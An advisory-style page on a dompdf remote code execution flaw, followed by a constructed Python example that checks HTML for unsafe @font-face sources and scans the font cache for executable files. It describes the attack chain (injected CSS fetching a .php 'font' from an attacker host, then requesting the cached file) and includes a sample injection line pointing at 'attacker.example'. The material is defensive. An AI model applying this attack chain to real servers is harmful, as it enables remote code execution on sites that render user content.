A zero-day vulnerability has been identified in dompdf, a PHP library that converts HTML to PDF, which can lead to remote code execution in certain configurations.
To execute code on the target, an attacker first hosts a font file whose name ends in a .php extension on a server they control. Through an XSS (or other HTML/CSS injection) flaw in the site that feeds user input into dompdf, the attacker injects a CSS @font-face rule that references that remote file. When dompdf renders the page with remote fetching enabled, it downloads the font into its font cache and keeps the .php extension. The attacker then requests the cached file directly from the web-accessible dompdf directory, and the web server hands it to the PHP interpreter, giving remote code execution. The flaw is most dangerous for sites that generate PDFs server-side from user-supplied content, such as ticket purchases and payslips, especially where the input is not sanitized well enough to block XSS and the dompdf library is installed in a publicly accessible directory.
According to statistics published by GitHub, dompdf has about 59,250 installations. Dompdf 1.2.0 and earlier versions are vulnerable when the "$isRemoteEnabled" option is enabled and the library is located in a directory reachable over the Internet. Versions 0.8.5 and earlier are affected even when this option is set to "false." Users of vulnerable dompdf versions are therefore advised to move dompdf outside the web root, set "$isRemoteEnabled" to "false," and harden input handling so that user input is sanitized against XSS, until a release that fixes the vulnerability is available.
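The two checks below are an added example written for this page, not code from dompdf or from the original advisory. The first inspects HTML that is about to be handed to the renderer and flags @font-face sources that are remote or that would be cached under a non-font file name (the .php trick described above); the second lists files in a font cache directory whose extension the web server would execute. The sample HTML and the throwaway cache directory are constructed for the example; the file names inside it, and the assumption that dompdf keeps its own index file named dompdf_font_family_cache.php in that directory, are not taken from the page. These checks complement, and do not replace, the mitigations listed above (disabling remote fetching and keeping the library out of the web root).

```python
"""Pre-render and post-render checks for the dompdf font-cache weakness.

Constructed example: user-controlled HTML is inspected before it reaches
dompdf, and the font cache directory is scanned for executable file names.
"""
import os
import re
import tempfile
from urllib.parse import urlparse

# Extensions a font source is expected to carry.
FONT_EXTENSIONS = {"ttf", "otf", "woff", "woff2", "afm", "pfb"}
# Extensions a typical PHP-enabled web server would execute if the cache
# directory is reachable over the web.
EXECUTABLE_EXTENSIONS = {"php", "phtml", "php5", "phar"}
# Assumed name of dompdf's own font index file in the cache directory.
CACHE_INDEX_ALLOWLIST = ("dompdf_font_family_cache.php",)

FONT_FACE_RE = re.compile(r"@font-face\s*\{(.*?)\}", re.IGNORECASE | re.DOTALL)
URL_RE = re.compile(r"""url\(\s*['"]?([^'")]+)['"]?\s*\)""", re.IGNORECASE)


def font_face_sources(html: str) -> list[str]:
    """Return every url() referenced from an @font-face rule in the markup."""
    sources = []
    for block in FONT_FACE_RE.findall(html):
        sources.extend(URL_RE.findall(block))
    return sources


def extension_of(ref: str) -> str:
    """Lower-cased extension of the path part of a URL or relative reference."""
    path = urlparse(ref).path
    return path.rsplit(".", 1)[-1].lower() if "." in path else ""


def unsafe_font_references(html: str) -> list[str]:
    """Font sources that are remote, or that carry a non-font extension.

    Either condition is enough to reject the document before rendering:
    a remote source means dompdf would fetch and cache attacker content,
    and a non-font extension means the cached copy could be executable.
    """
    bad = []
    for src in font_face_sources(html):
        parsed = urlparse(src)
        remote = parsed.scheme in ("http", "https") or src.startswith("//")
        if remote or extension_of(src) not in FONT_EXTENSIONS:
            bad.append(src)
    return bad


def suspicious_cached_fonts(font_dir: str) -> list[str]:
    """Files in the font cache whose name the web server would execute."""
    hits = []
    for name in sorted(os.listdir(font_dir)):
        if name in CACHE_INDEX_ALLOWLIST:
            continue
        ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
        if ext in EXECUTABLE_EXTENSIONS:
            hits.append(name)
    return hits


# Constructed sample input: a ticket page carrying an injected @font-face rule.
INJECTED_HTML = """<p>Ticket for Alice</p>
<style>
@font-face { font-family: 'evil'; src: url('http://attacker.example/fonts/evil.php'); }
</style>
<span style="font-family: 'evil'">x</span>"""

# Constructed benign input: a local font with a normal extension.
SAFE_HTML = """<style>@font-face { font-family: 'Corp'; src: url('fonts/corp.ttf'); }
</style><p>Ticket</p>"""


def demo_cache_scan() -> list[str]:
    """Build a throwaway cache directory (constructed, not a real dompdf tree)."""
    with tempfile.TemporaryDirectory() as d:
        for name in ("dompdf_font_family_cache.php",
                     "corp_normal_1a2b.ttf",
                     "evil_normal_3c4d.php"):
            open(os.path.join(d, name), "w").close()
        return suspicious_cached_fonts(d)


if __name__ == "__main__":
    print("unsafe in injected page:", unsafe_font_references(INJECTED_HTML))
    print("unsafe in safe page:", unsafe_font_references(SAFE_HTML))
    print("executable files in cache:", demo_cache_scan())
```

Run the pre-render check on every document before it is passed to the converter and reject anything it flags; run the cache scan on a schedule or from a deployment check, and treat any hit as a sign that the cache directory has already been abused rather than as a configuration nit.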